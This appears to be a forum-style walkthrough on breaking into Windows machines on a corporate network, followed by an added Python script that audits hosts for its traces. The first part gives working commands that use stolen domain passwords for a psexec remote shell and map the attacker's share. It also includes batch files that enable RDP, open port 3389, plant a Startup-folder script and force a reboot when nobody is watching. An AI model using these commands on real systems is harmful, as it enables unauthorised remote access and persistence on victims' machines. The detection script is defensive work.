Corporate Windows Pentest


In most corporate environments all the XP boxes are on a domain, which means their credentials are flying around all over the network. Cracking those passwords is difficult because of the Kerberos encryption scheme; however, most people's personal passwords, to things like MySpace, etc., will not be encrypted, and sometimes these passwords are the same as their domain credentials.

Traditionally, on machines in a corporate network RDP is enabled, but if it isn't you can use psexec to get it set up.

http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx

Open the cmd prompt by hitting start run, then typing cmd then hitting enter.

Type this into the cmd prompt (make sure you are in the directory that psexec is in when you do this; you could add psexec to the system path if you get in the habit of using it):

```
psexec \\machinename -u username cmd
```

It will prompt you for a password, which hopefully you have previously snagged. Replace username with the actual account name, not the word itself. The cmd at the end of the command above says to execute a cmd prompt, which will appear on your machine as a standard cmd, but it is linked to their machine. To verify you are connected to their machine, type hostname and make sure their machine name is shown, not yours. PSEXEC has an option for uploading a file when you use it, but I haven't had the best of luck with it. What I do is use the net command to map a drive to your computer from the other computer, i.e.:

```
net use r: \\yourmachinename\public /persistent:no
```

This will map the drive to your computer's shared folder named public. So now you can just type the following (remember this is in the remote machine's cmd, not your own):

```
r:
```


From there you can run a silent install of VNC for some sweet GUI action, or, if you know no one is actually in front of the computer, you can create these three bat files and run first.bat.

Make three .bat files in the same directory on a thumb drive:

first.bat

code:

```
rem allow Terminal Services connections
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
mkdir c:\batter
copy second.bat c:\batter
copy third.bat c:\batter
rem the Startup folder path contains spaces, so it must be quoted
cd "%USERPROFILE%\Start Menu\Programs\Startup"
copy c:\batter\second.bat start.bat
shutdown -r -t 0
```

second.bat

code:

```
netsh firewall set portopening tcp 3389 "RemoteDesktop"
cd c:\batter
third.bat
```

third.bat

code:

```
cd "%USERPROFILE%\Start Menu\Programs\Startup"
del start.bat
```


This enables remote desktop on that machine and you can now remote in.
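As an added example that is not part of the original post: a small audit that looks for the three traces this procedure leaves on a host (fDenyTSConnections set to 0, a .bat file in the user's Startup folder, and TCP 3389 opened in the XP firewall). The registry export, Startup folder listing and netsh output below are constructed samples, laid out roughly like the real tool output, not captures from a real machine.

```python
import re

# Constructed sample of 'reg export' output after first.bat has run (not real data).
REG_EXPORT = r"""
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"""

# Constructed listing of %USERPROFILE%\Start Menu\Programs\Startup.
STARTUP_LISTING = ["desktop.ini", "start.bat"]

# Constructed output in the shape of 'netsh firewall show portopening'.
NETSH_OUTPUT = """Port   Protocol  Mode     Name
-------------------------------------------------------------------
3389   TCP       Enable   RemoteDesktop
"""

RDP_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"

def parse_reg_export(text):
    """Parse a .reg export into {key: {value_name: int}} for dword values only."""
    result, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            current = m.group(1)
            result[current] = {}
            continue
        m = re.match(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$', line)
        if m and current is not None:
            result[current][m.group(1)] = int(m.group(2), 16)
    return result

def parse_portopenings(text):
    """Return [(port, proto, mode, name)] from netsh-style rows; skips header and rules."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 4 and parts[0].isdigit():
            rows.append((int(parts[0]), parts[1].upper(), parts[2].lower(), " ".join(parts[3:])))
    return rows

def audit(reg_text, startup_files, netsh_text):
    """Return a list of finding tags; an empty list means none of the three traces were seen."""
    findings = []
    if parse_reg_export(reg_text).get(RDP_KEY, {}).get("fDenyTSConnections") == 0:
        findings.append("rdp_enabled")
    bats = sorted(f for f in startup_files if f.lower().endswith(".bat"))
    if bats:
        findings.append("startup_bat:" + ",".join(bats))
    for port, proto, mode, name in parse_portopenings(netsh_text):
        if port == 3389 and proto == "TCP" and mode == "enable":
            findings.append("fw_3389_open:" + name)
    return findings

if __name__ == "__main__":
    print(audit(REG_EXPORT, STARTUP_LISTING, NETSH_OUTPUT))
```

Any one finding on its own can be legitimate; all three together on a workstation that is not supposed to accept RDP is the pattern worth raising.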
